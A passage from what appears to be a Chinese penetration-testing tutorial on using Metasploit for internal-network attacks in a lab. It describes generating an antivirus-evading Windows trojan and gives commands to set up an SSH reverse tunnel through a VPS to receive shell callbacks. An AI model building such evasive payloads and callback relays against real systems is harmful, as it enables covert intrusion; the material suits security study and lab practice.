Metasploit 是目前最流行、最强大、最具扩展性的渗透测试平台软件,是笔者最崇拜也最喜欢的工具没有之一,下面我将用 msf 给大家带来一场盛大的内网渗透体验,别眨眼噢!
0x01. 实战操作
环境准备:
靶机 win 7 IP=192.168.43.150
kali linux IP=192.168.43.153
VPS 服务器 IP=xx.xx.xx.xx
实战演示:
1、先用 evil-evasion 生成具有一定免杀功能的 windows 木马,监听地址设成 VPS 的地址(打码防 D),然后将 VPS 上的 2333 端口映射到内网 kali 的 2333 端口,同时还要修改 VPS上 的 ssh 配置,不然别人是连不上 VPS 的(在实战中自己常常在内网,所以这里介绍一下 VPS )
vi /etc/ssh/sshd_config && GatewayPorts:yes
ssh -CfNg -R xx.xx.xx.xx:2333:192.168.43.153:2333 root@xx.xx.xx.xx -p 29402